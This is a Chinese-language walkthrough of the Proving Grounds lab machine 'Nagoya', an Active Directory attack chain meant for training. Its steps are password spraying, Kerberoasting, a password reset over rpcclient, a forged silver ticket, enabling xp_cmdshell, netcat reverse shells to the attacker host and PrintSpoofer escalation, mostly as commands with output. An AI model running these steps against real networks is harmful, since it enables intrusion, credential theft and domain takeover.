ProvingGrounds Nagoya Writeup

Xavier 收录于靶场

2024-02-07 约 4900 字预计阅读 10 分钟 - 次阅读

Nagoya

这是第22台，Windows系统，难度Hard，名称 Nagoya

192.168.166.21

PortScan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


┌──(xavier㉿kali)-[~/Desktop/OSCP]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.166.21 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-07 15:09 CST
Nmap scan report for 192.168.166.21
Host is up (0.25s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
80/tcp   open  http              Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-02-07 07:09:23Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.86 seconds

InitAccess

80-Web

发现80的Web服务重有个Team页面，包含了团队成员

根据这个页面制作字典，我最初设计的字典格式是：Emma Miah， Emma.Miah， EmmaMiah 三种格式

使用Kerbrute验证有效的域用户：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ kerbrute -domain nagoya-industries.com -users ./teams.txt -dc-ip 192.168.166.21

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Valid user => Matthew.Harrison
[*] Valid user => Emma.Miah
[*] Valid user => Rebecca.Bell
[*] Valid user => Scott.Gardner
[*] Valid user => Terry.Edwards
[*] Valid user => Holly.Matthews
[*] Valid user => Anne.Jenkins
[*] Valid user => Brett.Naylor
[*] Valid user => Melissa.Mitchell
[*] Valid user => Craig.Carr
[*] Valid user => Fiona.Clark
[*] Valid user => Patrick.Martin
[*] Valid user => Kate.Watson
[*] Valid user => Kirsty.Norris
[*] Valid user => Andrea.Hayes
[*] Valid user => Abigail.Hughes
[*] Valid user => Melanie.Watson
[*] Valid user => Frances.Ward
[*] Valid user => Sylvia.King
[*] Valid user => Wayne.Hartley
[*] Valid user => Iain.White
[*] Valid user => Joanna.Wood
[*] Valid user => Bethan.Webster
[*] Valid user => Elaine.Brady
[*] Valid user => Christopher.Lewis
[*] Valid user => Megan.Johnson
[*] Valid user => Damien.Chapman
[*] Valid user => Joanne.Lewis
[*] No passwords were discovered :'(

Hint-1

Foothold 1

Build a username wordlist with the names found in the web app, you can try conventions like Offsec.Labs . Spraying easy password combinations like seasons + years is always a good start.

SMB-445

根据提示，构建密码字典，如：Spring2023、Summer2023、Autumn2023、Winter2023等。

这里不看提示真的很难。

SMB枚举：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ crackmapexec smb 192.168.166.21 -u ./users.txt -p 'Summer2023' --shares 
SMB         192.168.166.21  445    NAGOYA           [*] Windows 10.0 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Matthew.Harrison:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Emma.Miah:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Rebecca.Bell:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Scott.Gardner:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Terry.Edwards:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Holly.Matthews:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Anne.Jenkins:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Brett.Naylor:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Melissa.Mitchell:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [-] nagoya-industries.com\Craig.Carr:Summer2023 STATUS_LOGON_FAILURE 
SMB         192.168.166.21  445    NAGOYA           [+] nagoya-industries.com\Fiona.Clark:Summer2023 
SMB         192.168.166.21  445    NAGOYA           [+] Enumerated shares
SMB         192.168.166.21  445    NAGOYA           Share           Permissions     Remark
SMB         192.168.166.21  445    NAGOYA           -----           -----------     ------
SMB         192.168.166.21  445    NAGOYA           ADMIN$                          Remote Admin
SMB         192.168.166.21  445    NAGOYA           C$                              Default share
SMB         192.168.166.21  445    NAGOYA           IPC$            READ            Remote IPC
SMB         192.168.166.21  445    NAGOYA           NETLOGON        READ            Logon server share 
SMB         192.168.166.21  445    NAGOYA           SYSVOL          READ            Logon server share

拿到一套有效的账户名密码：Fiona.Clark:Summer2023

登录SMB：

1
2
3
4
5
6
7
8
9


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ smbclient  //192.168.166.21/SYSVOL -U Fiona.Clark%Summer2023
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Apr 30 14:31:25 2023
  ..                                  D        0  Sun Apr 30 14:31:25 2023
  nagoya-industries.com              Dr        0  Sun Apr 30 14:31:25 2023

                10328063 blocks of size 4096. 4800089 blocks available

翻文件，找到一个ResetPassword目录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


smb: \> ls nagoya-industries.com\scripts\resetpassword\
  .                                   D        0  Sun Apr 30 16:07:07 2023
  ..                                  D        0  Sun Apr 30 16:07:07 2023
  ResetPassword.exe                   A     5120  Mon May  1 01:04:02 2023
  ResetPassword.exe.config            A      189  Mon May  1 00:53:50 2023
  System.IO.FileSystem.AccessControl.dll      A    28552  Tue Oct 20 11:39:30 2020
  System.IO.FileSystem.AccessControl.xml      A    65116  Sat Oct 10 13:10:54 2020
  System.Security.AccessControl.dll      A    35952  Sat Oct 23 16:45:08 2021
  System.Security.AccessControl.xml      A   231631  Wed Oct 20 00:14:20 2021
  System.Security.Permissions.dll      A    30328  Wed Oct 19 09:34:02 2022
  System.Security.Permissions.xml      A     8987  Wed Oct 19 09:34:02 2022
  System.Security.Principal.Windows.dll      A    18312  Tue Oct 20 11:46:28 2020
  System.Security.Principal.Windows.xml      A    90968  Sat Oct 10 13:10:54 2020

                10328063 blocks of size 4096. 4800089 blocks available

下载config和xml文件，没发现敏感信息。

Hint-2

Foothold 2

Enumerate shares, find the binary and reverse engineer it. Make use of credentials you found. Keep in mind that one can still enumerate ACLs without actually getting a shell

经过提示需要逆向分析，于是下载exe文件到本地，进行逆向。

将SMB ResetPassword目录下的所有文件都放到Windows x86架构的机子上，使用dnSpy工具对exe文件进行逆向，发现一组硬编码服务账户密码：svc_helpdesk/U299iYRmikYTHDbPbxPoYYfa2j4x4cdg

Kerberoasting

获取SPN

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ impacket-GetUserSPNs nagoya-industries.com/fiona.clark:'Summer2023' -dc-ip 192.168.166.21 -debug -outputfile kerberoast.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 192.168.166.21, port 389, SSL False
[+] Total of records returned 5
ServicePrincipalName                Name          MemberOf                                          PasswordLastSet             LastLogon                   Delegation 
----------------------------------  ------------  ------------------------------------------------  --------------------------  --------------------------  ----------
http/nagoya.nagoya-industries.com   svc_helpdesk  CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com  2023-04-30 15:31:06.190955  <never>                                
MSSQL/nagoya.nagoya-industries.com  svc_mssql                                                       2023-04-30 15:45:33.288595  2023-06-16 05:38:06.145798             

[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at 192.168.166.21
[+] Trying to connect to KDC at 192.168.166.21
[+] Trying to connect to KDC at 192.168.166.21
[+] Trying to connect to KDC at 192.168.166.21

解密：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Service1         (?)     
1g 0:00:00:13 DONE (2024-02-07 17:10) 0.07189g/s 1031Kp/s 1106Kc/s 1106KC/s -xlengx-..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

获得第二个服务账户密码：svc_mssql/Service1

RPC

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ rpcclient -U nagoya-industries/svc_helpdesk 192.168.166.21
Password for [NAGOYA-INDUSTRIES\svc_helpdesk]:
rpcclient $> 
# 枚举域用户
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_helpdesk] rid:[0x450]
user:[Matthew.Harrison] rid:[0x452]
user:[Emma.Miah] rid:[0x453]
user:[Rebecca.Bell] rid:[0x454]
user:[Scott.Gardner] rid:[0x455]
user:[Terry.Edwards] rid:[0x456]
user:[Holly.Matthews] rid:[0x457]
user:[Anne.Jenkins] rid:[0x458]
user:[Brett.Naylor] rid:[0x459]
user:[Melissa.Mitchell] rid:[0x45a]
user:[Craig.Carr] rid:[0x45b]
user:[Fiona.Clark] rid:[0x45c]
user:[Patrick.Martin] rid:[0x45d]
user:[Kate.Watson] rid:[0x45e]
user:[Kirsty.Norris] rid:[0x45f]
user:[Andrea.Hayes] rid:[0x460]
user:[Abigail.Hughes] rid:[0x461]
user:[Melanie.Watson] rid:[0x462]
user:[Frances.Ward] rid:[0x463]
user:[Sylvia.King] rid:[0x464]
user:[Wayne.Hartley] rid:[0x465]
user:[Iain.White] rid:[0x467]
user:[Joanna.Wood] rid:[0x468]
user:[Bethan.Webster] rid:[0x469]
user:[Elaine.Brady] rid:[0x46b]
user:[Christopher.Lewis] rid:[0x46c]
user:[Megan.Johnson] rid:[0x46d]
user:[Damien.Chapman] rid:[0x46e]
user:[Joanne.Lewis] rid:[0x46f]
user:[svc_mssql] rid:[0x470]
user:[svc_tpl] rid:[0x471]
user:[svc_web] rid:[0x472]
# 枚举域内组
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[employees] rid:[0x451]
group:[helpdesk] rid:[0x466]
group:[developers] rid:[0x46a]

# 查询用户所属组
rpcclient $> queryusergroups 0x45c
        group rid:[0x201] attr:[0x7]
        group rid:[0x451] attr:[0x7]
……
rpcclient $> queryusergroups 0x46c
        group rid:[0x201] attr:[0x7]
        group rid:[0x46a] attr:[0x7]
        group rid:[0x451] attr:[0x7]

发现用户Christopher.Lewis 有三个组：Domain Users、employees 和 developers，比其他用户多一个 developers 组，推测是开发人员。

这里没有远程管理的组，猜测 developers 组是否能远程。尝试修改 Christopher.Lewis 用户密码。svc_helpdesk 账号对christopher.lewis 具有完全控制权限，可以重置其账号

1

rpcclient $> setuserinfo christopher.lewis 23 'Admin@123'

尝试远程登录。使用Evil-WinRM登录成功

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ evil-winrm -u christopher.lewis -p 'Admin@123' -i 192.168.166.21

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                           

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> ls
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> whoami
nagoya-ind\christopher.lewis

*Evil-WinRM* PS C:\Users\Christopher.Lewis> type C:\local.txt
81950a6ba1771f388080cb994a7fcb33

PrivE

上传sharphound进行信息搜集

1
2
3


*Evil-WinRM* PS C:\tmp> upload SharpHound.exe
*Evil-WinRM* PS C:\tmp> ./SharpHound.exe -c All --OutputPrefix "Nagoya-"
*Evil-WinRM* PS C:\tmp> download Nagoya-_20240207014142_BloodHound.zip

下载过程一直失败，使用SMB进行文件传输。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ impacket-smbserver share $(pwd) -smb2support                            
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

*Evil-WinRM* PS C:\tmp> copy Nagoya-_20240207014142_BloodHound.zip \\192.168.45.193\share\Nagoya-_20240207014142_BloodHound.zip

没分析出有用信息。

MSSQL

考虑到有个mssql账户，查看当前端口列表，发现存在1433端口，说明有mssql服务。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


*Evil-WinRM* PS C:\tmp> netstat -anop TCP

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2264
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1016
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2624
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       480
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       760
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       1008
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       1008
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING       2476
  TCP    0.0.0.0:49677          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49684          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49691          0.0.0.0:0              LISTENING       2616
  TCP    0.0.0.0:49710          0.0.0.0:0              LISTENING       2648
  TCP    0.0.0.0:52804          0.0.0.0:0              LISTENING       2264
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2616
  TCP    127.0.0.1:389          127.0.0.1:49674        ESTABLISHED     628
  TCP    127.0.0.1:389          127.0.0.1:49676        ESTABLISHED     628
  TCP    127.0.0.1:389          127.0.0.1:49742        ESTABLISHED     628
  TCP    127.0.0.1:49674        127.0.0.1:389          ESTABLISHED     2684
  TCP    127.0.0.1:49676        127.0.0.1:389          ESTABLISHED     2684
  TCP    127.0.0.1:49742        127.0.0.1:389          ESTABLISHED     2616
  TCP    192.168.166.21:53      0.0.0.0:0              LISTENING       2616
  TCP    192.168.166.21:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.166.21:389     192.168.166.21:49771   ESTABLISHED     628
  TCP    192.168.166.21:389     192.168.166.21:49839   ESTABLISHED     628
  TCP    192.168.166.21:389     192.168.166.21:49846   ESTABLISHED     628
  TCP    192.168.166.21:445     192.168.45.193:54162   ESTABLISHED     4
  TCP    192.168.166.21:5985    192.168.45.193:34646   TIME_WAIT       0
  TCP    192.168.166.21:5985    192.168.45.193:34658   ESTABLISHED     4
  TCP    192.168.166.21:5985    192.168.45.193:55274   TIME_WAIT       0
  TCP    192.168.166.21:49771   192.168.166.21:389     ESTABLISHED     2616
  TCP    192.168.166.21:49839   192.168.166.21:389     ESTABLISHED     2648
  TCP    192.168.166.21:49846   192.168.166.21:389     ESTABLISHED     2648
  TCP    192.168.166.21:50482   52.168.117.173:443     ESTABLISHED     3488
  TCP    192.168.166.21:50490   23.77.197.149:80       SYN_SENT        3488

上传chisel 进行端口转发，将1433端口代理出来

1
2
3
4
5


*Evil-WinRM* PS C:\tmp> upload chisel.exe
*Evil-WinRM* PS C:\tmp> cmd /c 'C:\tmp\chisel.exe client 192.168.45.193:8000 R:1433:127.0.0.1:1433'

# kali
$ chisel server -p 8000 --reverse

本地登录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ impacket-mssqlclient svc_mssql:'Service1'@127.0.0.1 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL> 

尝试启用xp_cmdshell失败，权限不足

1
2
3
4
5
6
7
8


SQL> exec xp_cmdshell 'whoami';
[-] ERROR(nagoya\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL> EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[-] ERROR(nagoya\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(nagoya\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(nagoya\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(nagoya\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> 

Hint-3

Escalation

Perform kerberoast, crack the password of service account for mssql. Use everything you gathered to forge a silver ticket. Elevate your privileges on mssql by impersonating to administrator using the silver ticket.

白银票据

因为现在已经有svc_mssql的账户密码，可以考虑通过白银票据传递，模拟高权限的管理员。

回顾白银票据的利用条件，需要如下信息：

要伪造的域用户（一般是域管理员账户）: Administrator
域名 : nagoya-industries.com
域的SID值
可利用的服务 : MSSQL
目标服务的SPN
目标服务账户的NTLM哈希

现在还需要域的SID、MSSQL服务的SPN，svc_mssql的NTLM Hash

目前已有svc_mssql的明文密码，使用https://codebeautify.org/ntlm-hash-generator 生成 NTLM Hash，

域的SID通过powershell查询

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


*Evil-WinRM* PS C:\tmp> Get-ADDomain

AllowedDNSSuffixes                 : {}
ChildDomains                       : {}
ComputersContainer                 : CN=Computers,DC=nagoya-industries,DC=com
DeletedObjectsContainer            : CN=Deleted Objects,DC=nagoya-industries,DC=com
DistinguishedName                  : DC=nagoya-industries,DC=com
DNSRoot                            : nagoya-industries.com
DomainControllersContainer         : OU=Domain Controllers,DC=nagoya-industries,DC=com
DomainMode                         : Windows2016Domain
DomainSID                          : S-1-5-21-1969309164-1513403977-1686805993
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=nagoya-industries,DC=com
Forest                             : nagoya-industries.com
InfrastructureMaster               : nagoya.nagoya-industries.com
LastLogonReplicationInterval       :
LinkedGroupPolicyObjects           : {CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=nagoya-industries,DC=com}
LostAndFoundContainer              : CN=LostAndFound,DC=nagoya-industries,DC=com
ManagedBy                          :
Name                               : nagoya-industries
NetBIOSName                        : NAGOYA-IND
ObjectClass                        : domainDNS
ObjectGUID                         : 1153c877-efa1-443b-b59f-c32c9286750e
ParentDomain                       :
PDCEmulator                        : nagoya.nagoya-industries.com
PublicKeyRequiredPasswordRolling   : True
QuotasContainer                    : CN=NTDS Quotas,DC=nagoya-industries,DC=com
ReadOnlyReplicaDirectoryServers    : {}
ReplicaDirectoryServers            : {nagoya.nagoya-industries.com}
RIDMaster                          : nagoya.nagoya-industries.com
SubordinateReferences              : {DC=ForestDnsZones,DC=nagoya-industries,DC=com, DC=DomainDnsZones,DC=nagoya-industries,DC=com, CN=Configuration,DC=nagoya-industries,DC=com}
SystemsContainer                   : CN=System,DC=nagoya-industries,DC=com
UsersContainer                     : CN=Users,DC=nagoya-industries,DC=com

MSSQL服务的SPN 也用Powershell查询

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


*Evil-WinRM* PS C:\tmp> Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames

DistinguishedName     : CN=svc_mssql,CN=Users,DC=nagoya-industries,DC=com
Enabled               : True
GivenName             : svc_mssql
Name                  : svc_mssql
ObjectClass           : user
ObjectGUID            : df7dda21-173f-4a4a-88ed-70d69481b46e
SamAccountName        : svc_mssql
ServicePrincipalNames : {MSSQL/nagoya.nagoya-industries.com}
SID                   : S-1-5-21-1969309164-1513403977-1686805993-1136
Surname               :
UserPrincipalName     : svc_mssql@nagoya-industries.com

最后得到所需的内容如下：

1
2
3


NTLM Hash: E3A0168BC21CFB88B95C954A5B18F57C
Domain SID: S-1-5-21-1969309164-1513403977-1686805993
Service SPN: {MSSQL/nagoya.nagoya-industries.com}

准备工作完成，那就尝试生成白银票据

1
2


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator

接下去导入票据，连接

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ export KRB5CCNAME=$PWD/Administrator.ccache

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ klist
Ticket cache: FILE:/home/xavier/Desktop/OSCP/PG_Practice/Nagoya/Administrator.ccache
Default principal: Administrator@NAGOYA-INDUSTRIES.COM

Valid starting       Expires              Service principal
2024-02-07T20:20:46  2034-02-04T20:20:46  MSSQL/nagoya.nagoya-industries.com@NAGOYA-INDUSTRIES.COM
        renew until 2034-02-04T20:20:46

编辑 /etc/hosts 和 /etc/krb5user.conf

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


# /etc/hosts
127.0.0.1       nagoya.nagoya-industries.com nagoya-industries.com

# /etc/krb5user.conf
[libdefaults]
        default_realm = NAGOYA-INDUSTRIES.COM
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true

[realms]        
        NAGOYA-INDUSTRIES.COM = {
                kdc = nagoya.nagoya-industries.com
        }

[domain_realm]
        .nagoya-industries.com = NAGOYA-INDUSTRIES.COM

连接mssql服务

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ impacket-mssqlclient -k nagoya.nagoya-industries.com
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL> select system_user;
--------------------------------------
NAGOYA-IND\Administrator

成功开启并执行xp_cmdshell

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


SQL> exec xp_cmdshell 'whoami';
[-] ERROR(nagoya\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> exec xp_cmdshell 'whoami';
output
-------  
nagoya-ind\svc_mssql
NULL

SQL>

执行反弹shell到nc

1

SQL> exec xp_cmdshell 'C:\tmp\nc64.exe 192.168.45.193 4444 -e powershell';

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice/Nagoya]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.193] from (UNKNOWN) [192.168.166.21] 50232
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nagoya-ind\svc_mssql
PS C:\Windows\system32> 

检查当前用户权限：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


PS C:\tmp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

发现有SeImpersonatePrivilege，可以利用提权，上传 PrintSpoofer64.exe 进行提权

1
2
3
4
5


PS C:\tmp> .\PrintSpoofer64.exe -c "C:\tmp\nc64.exe 192.168.45.193 5555 -e powershell"
.\PrintSpoofer64.exe -c "C:\tmp\nc64.exe 192.168.45.193 5555 -e powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
